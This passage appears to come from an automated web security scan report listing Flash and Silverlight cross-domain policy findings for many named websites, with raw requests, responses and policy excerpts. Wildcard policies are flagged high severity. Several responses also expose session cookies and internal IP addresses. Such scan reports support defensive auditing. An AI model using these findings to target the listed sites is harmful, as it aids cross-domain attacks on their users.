Date: Wed, 04 May 2011 01:11:48 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.2.9
Last-Modified: Mon, 18 Jan 2010 18:57:08 GMT
ETag: "e431e-1da-47d74eb86c900"
Accept-Ranges: bytes
Content-Length: 474
Vary: User-Agent
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="freecollegescholarships.net" />
<allow-access-from domain="fcs3.freecollegescholarships.net" />
<allow-access-from domain="yourfreescholarship.com" />
<allow-access-from domain="yourscholarshipgiveaway.com" />
<allow-access-from domain="scholarshipsguaranteed.com" />
...[SNIP]...

7.369. http://www.scientology.org/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scientology.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.scientology.org

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Sat, 12 Jun 2010 05:07:58 GMT
ETag: "1e30029-9b-488ce3d2f6780"
Content-Type: text/xml
Date: Wed, 04 May 2011 02:09:25 GMT
Content-Length: 155
Connection: close

<cross-domain-policy>
   <allow-access-from domain="cosi90028.edgeboss.net"/>
   <allow-access-from domain="www.scientology.org" />
</cross-domain-policy>

7.370. http://www.scott-sports.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scott-sports.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.scott-sports.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:38:09 GMT
Server: Apache
Last-Modified: Thu, 10 Dec 2009 18:08:00 GMT
ETag: "fe4a36-1a3-47a63b0004000"
Accept-Ranges: bytes
Content-Length: 419
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8" ?>

<cross-domain-policy>
   <allow-access-from domain="scottflash.s3.amazonaws.com" />
   <allow-access-from domain="flash.scottusa.com" />
   <allow-access-from domain="flash.scott-sports.com" />
   <allow-access-from domain="d2qcdwiuv3wbom.cloudfront.net" />
   <allow-access-from domain="scottusa_redesign" />
...[SNIP]...

7.371. http://www.tapout.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tapout.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tapout.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:09:22 GMT
Server: PWS/1.7.2.1
X-Px: ms iad-agg-n31 ( iad-agg-n23), rf-ht iad-agg-n23 ( origin>CONN)
ETag: "0f8735395dfc91:11c3"
Cache-Control: max-age=3600
Expires: Wed, 04 May 2011 05:09:22 GMT
Age: 0
Content-Length: 171
Content-Type: text/xml
Last-Modified: Thu, 28 May 2009 13:08:00 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="www.inyaface.com" />
   <allow-access-from domain="inyaface.com" />
</cross-domain-policy>


7.372. http://www.theworldsbestever.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.theworldsbestever.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.theworldsbestever.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:02:53 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Mon, 06 Oct 2008 05:00:00 GMT
Accept-Ranges: bytes
Content-Length: 282
Vary: User-Agent
X-Powered-By: W3 Total Cache/0.9.1.3
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.theworldsbestever.com
...[SNIP]...
<allow-access-from domain="theworldsbestever.com" />
...[SNIP]...

7.373. http://www.treknature.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.treknature.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.treknature.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:41:48 GMT
Server: Apache/1.3.37 (Unix)
Last-Modified: Thu, 30 Aug 2007 18:30:38 GMT
ETag: "31f8fc-c3-46d70cce"
Accept-Ranges: bytes
Content-Length: 195
Connection: close
Content-Type: application/xml

<cross-domain-policy>
<allow-access-from domain="www.treknature.com" />
<allow-access-from domain="treknature.com" />
<allow-access-from domain="i1.treknature.com" />
</cross-domain-policy>

7.374. http://www.twinspires.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.twinspires.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.twinspires.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.11 (Unix)
Last-Modified: Tue, 28 Sep 2010 15:12:49 GMT
ETag: "2b948-3fe-4915347289e40"
Accept-Ranges: bytes
Content-Length: 1022
Content-Type: text/xml
Expires: Wed, 04 May 2011 02:17:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 04 May 2011 02:17:58 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="www.twinspires.com" secure="false"/>
<allow-access-from domain="beta.twinspires.com" secure="false"/>
<allow-access-from domain="CDLT0083.churchill.cdi.com"/>
<allow-access-from domain="thomas-wan.com"/>
...[SNIP]...

7.375. http://www.ucc.org/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ucc.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ucc.org

Response

HTTP/1.0 200 OK
Server: Resin/3.1.8
Cache-Control: no-cache
ETag: "++qkfOYe72M"
Last-Modified: Tue, 09 Sep 2008 00:45:10 GMT
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: JSESSIONID=abc21nNExq6wZ9CtJ94_s; path=/
Content-Type: text/xml; charset=UTF-8
Date: Wed, 04 May 2011 03:03:53 GMT
Set-Cookie: NSC_dnt_900_qvc=ffffffff09041e3445525d5f4f58455e445a4a4214f4;expires=Wed, 04-May-2011 04:03:53 GMT;path=/;httponly
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.ucc.org" />
<allow-access-from domain="ucc.org" />
...[SNIP]...

7.376. http://www.usmc-mccs.org/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usmc-mccs.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.usmc-mccs.org

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 04 Nov 2010 18:52:28 GMT
Accept-Ranges: bytes
ETag: "dc319f6d517ccb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:36:30 GMT
Connection: close
Content-Length: 423

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!--Generic policy file for flex app access, it should be made more restricti
...[SNIP]...
<allow-access-from domain="http://www.shopmyexchange.com"/>
...[SNIP]...

7.377. http://www.uvaldeleadernews.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.uvaldeleadernews.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.uvaldeleadernews.com

Response

HTTP/1.1 200 OK
Server: WWW
Cache-Control: public, max-age=300
X-TNCMS-Memory-Usage: 2082616
Content-Type: text/x-cross-domain-policy; charset=UTF-8
X-TNCMS-Venue: app
Date: Wed, 04 May 2011 01:24:45 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.0481
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: close
Set-Cookie: TNNoMobile=1; path=/; expires=Thu, 2 Aug 2031 20:47:11 UTC
X-Cache-Info: caching
Real-Hostname: uvaldeleadernews.com
X-TNCMS-Served-By: cmsapp15
Content-Length: 315

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM
               "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="bloximages.chicago2.vip.townnews.com" to-ports="80" secure="false"/>
...[SNIP]...

7.378. http://www.veenx.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veenx.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.veenx.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/xml
Date: Wed, 04 May 2011 01:18:45 GMT
Accept-Ranges: bytes
Connection: close
Set-Cookie: X-Mapping-hmaddpem=1D361E8FEC3000E203CCB0B980CED464; path=/
Last-Modified: Wed, 12 May 2010 07:49:24 GMT
Content-Length: 224

<?xml version="1.0"?>
<!-- http://www.foo.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="www.buildabookkids.com" />
<allow-access-from domain="www.buildabookteens.com" />
...[SNIP]...

7.379. http://www.wacotribcars.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wacotribcars.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wacotribcars.com

Response

HTTP/1.1 200 OK
Set-Cookie: AlteonP=f49386bff49386b2; path=/
Date: Wed, 04 May 2011 01:13:54 GMT
Server: Apache/2.2.17 (Win32) PHP/5.2.14 JRun/4.0 mod_ssl/2.2.17 OpenSSL/0.9.8o
Set-Cookie: tracking=173.193.214.243.1304471634002754; path=/; expires=Mon, 31-Oct-11 01:13:54 GMT; domain=.carsite.com
Last-Modified: Fri, 25 Mar 2011 19:40:31 GMT
ETag: "484660000001e-341-49f53c44809c0"
Accept-Ranges: bytes
Content-Length: 833
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!--Generic policy file for flex app access, it should be made more restricti
...[SNIP]...
<allow-access-from domain="207.211.77.86"/>
<allow-access-from domain="207.211.77.87"/>
<allow-access-from domain="207.211.77.88"/>
<allow-access-from domain="10.127.60.10"/>
<allow-access-from domain="10.127.60.11"/>
<allow-access-from domain="10.127.60.12"/>
<allow-access-from domain="10.127.70.10"/>
<allow-access-from domain="10.127.70.11"/>
<allow-access-from domain="app.carsite.com"/>
<allow-access-from domain="76.242.101.65"/>
...[SNIP]...

7.380. http://www.weather.com.cn/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weather.com.cn
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.weather.com.cn

Response

HTTP/1.1 200 OK
Server: Apache/2.2.6 (Unix) DAV/2 SVN/1.4.6 mod_jk/1.2.26
Date: Wed, 04 May 2011 02:55:03 GMT
Content-Type: text/xml; charset=utf-8
Content-Length: 562
Last-Modified: Wed, 30 Jun 2010 02:06:15 GMT
Connection: close
Accept-Ranges: bytes
Set-Cookie: BIGipServerwww_pool=62456893.20480.0000; path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="heroes.weather.com.cn" secure="false" />
...[SNIP]...
<allow-access-from domain="flash.weather.com.cn" secure="false" />
...[SNIP]...
<allow-access-from domain="typhoon.weather.com.cn" secure="false" />
...[SNIP]...
<allow-access-from domain="61.4.185.54" secure="false" />
...[SNIP]...
<allow-access-from domain="60.247.116.29" secure="false" />
...[SNIP]...

7.381. http://www.webreserv.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.webreserv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.webreserv.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"722-1275406664454"
Last-Modified: Tue, 01 Jun 2010 15:37:44 GMT
Content-Type: application/xml
Content-Length: 722
Date: Wed, 04 May 2011 04:17:44 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for xmlsocket://socks.mysite.com -->
<cross-dom
...[SNIP]...
<allow-access-from domain="www.bouncy-rentals.com"/>
<allow-access-from domain="www.bouncy-rentals.com" secure="false"/>
...[SNIP]...

7.382. http://www.wheel-visualizer.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wheel-visualizer.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wheel-visualizer.com

Response

HTTP/1.1 200 OK
Content-Length: 188
Content-Type: text/xml
Content-Location: http://www.wheel-visualizer.com/crossdomain.xml
Last-Modified: Wed, 14 Sep 2005 21:44:58 GMT
Accept-Ranges: bytes
ETag: "029218d75b9c51:e71"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:17:01 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="mx.zomix.com" />
<allow-access-from domain="www.zomix.com" />
<allow-access-from domain="zomix.com" />
</cross-domain-policy>

7.383. http://www.widescreengamingforum.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.widescreengamingforum.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.widescreengamingforum.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:54:39 GMT
Server: Apache/2.2.8 (Ubuntu) mod_python/3.3.1 Python/2.5.2 PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
Last-Modified: Mon, 14 Apr 2008 16:54:52 GMT
ETag: "186"
Accept-Ranges: bytes
Content-Length: 390
Cache-Control: max-age=31536000
Expires: Thu, 03 May 2012 03:54:39 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.widescreengamingforum.
...[SNIP]...
<allow-access-from domain="widescreengamingforum.com" />
<allow-access-from domain="www.wsgfmedia.com" />
<allow-access-from domain="wsgfmedia.com" />
...[SNIP]...

7.384. http://www.wiscnews.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wiscnews.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wiscnews.com

Response

HTTP/1.1 200 OK
Server: WWW
Cache-Control: public, max-age=300
X-TNCMS-Memory-Usage: 2076988
Content-Type: text/x-cross-domain-policy; charset=UTF-8
X-TNCMS-Venue: app
Date: Wed, 04 May 2011 03:16:51 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.0328
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: close
Set-Cookie: TNNoMobile=1; path=/; expires=Thu, 2 Aug 2031 20:47:11 UTC
X-Cache-Info: caching
Real-Hostname: wiscnews.com
X-TNCMS-Served-By: cmsapp11
Content-Length: 315

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM
               "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="bloximages.chicago2.vip.townnews.com" to-ports="80" secure="false"/>
...[SNIP]...

8. Silverlight cross-domain policy  previous  next
There are 11 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


8.1. http://ad.doubleclick.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 20:54:04 GMT
Date: Wed, 04 May 2011 01:28:55 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

8.2. http://b.scorecardresearch.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Thu, 05 May 2011 01:28:53 GMT
Date: Wed, 04 May 2011 01:28:53 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

8.3. http://pixel.33across.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: pixel.33across.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
ETag: W/"335-1300735657000"
Last-Modified: Mon, 21 Mar 2011 19:27:37 GMT
Content-Type: application/xml
Content-Length: 335
Date: Wed, 04 May 2011 01:12:32 GMT
Connection: close
Server: 33XG1

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="SOAPAction">
<domain uri="*"/>
</allow-from>
<gr
...[SNIP]...

8.4. http://secure-us.imrworldwide.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:28:54 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Wed, 11 May 2011 01:28:54 GMT
Last-Modified: Mon, 19 Oct 2009 01:46:36 GMT
ETag: "ff-4adbc4fc"
Accept-Ranges: bytes
Content-Length: 255
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resource path="/" include-subpaths="true" />
</grant
...[SNIP]...

8.5. http://www.arkansasrazorbacks.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.arkansasrazorbacks.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.arkansasrazorbacks.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:57:50 GMT
Server: Apache
Last-Modified: Thu, 26 Mar 2009 08:16:48 GMT
ETag: "18a-466013cce5c00"
Accept-Ranges: bytes
Content-Length: 394
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
<domain uri="https://*"/>
<domain uri="http://*"/>
...[SNIP]...

8.6. http://www.cubuffs.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cubuffs.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.cubuffs.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:37:22 GMT
Server: Apache
Last-Modified: Thu, 26 Mar 2009 08:16:48 GMT
ETag: "18a-466013cce5c00"
Accept-Ranges: bytes
Content-Length: 394
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
<domain uri="https://*"/>
<domain uri="http://*"/>
...[SNIP]...

8.7. http://www.cycling.tv/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cycling.tv
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.cycling.tv

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:37:48 GMT
Server: Apache
Last-Modified: Thu, 26 Mar 2009 08:16:48 GMT
ETag: "18a-466013cce5c00"
Accept-Ranges: bytes
Content-Length: 394
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
<domain uri="https://*"/>
<domain uri="http://*"/>
...[SNIP]...

8.8. http://www.cyclones.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cyclones.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.cyclones.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:57:32 GMT
Server: Apache
Last-Modified: Thu, 26 Mar 2009 08:16:48 GMT
ETag: "18a-466013cce5c00"
Accept-Ranges: bytes
Content-Length: 394
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
<domain uri="https://*"/>
<domain uri="http://*"/>
...[SNIP]...

8.9. http://www.nbcolympics.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nbcolympics.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.nbcolympics.com

Response

HTTP/1.0 200 OK
Content-Length: 312
Content-Type: text/html
Cache-Control: max-age=60, must-revalidate
X-UA-Compatible: IE=EmulateIE7
Vary: User-Agent
ETag: "5eb50491058ca1:0"
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:08:47 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

8.10. http://www.tv2.no/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tv2.no
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.tv2.no

Response

HTTP/1.1 200 OK
ETag: "237048e-145-464b3cabab580"
Content-Type: text/xml
Last-Modified: Mon, 09 Mar 2009 18:27:50 GMT
Connection: close
Keep-Alive: timeout=5, max=999
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.2.0 (M;max-age=1200+86400;age=0;ecid=216173151523255559,1)
Content-Length: 325
Date: Wed, 04 May 2011 00:43:58 GMT
Accept-Ranges: bytes
Set-Cookie: lb_tv2=1254941633.20480.0000; path=/

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<grant-to>

...[SNIP]...

8.11. http://www.virginiasports.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.virginiasports.com
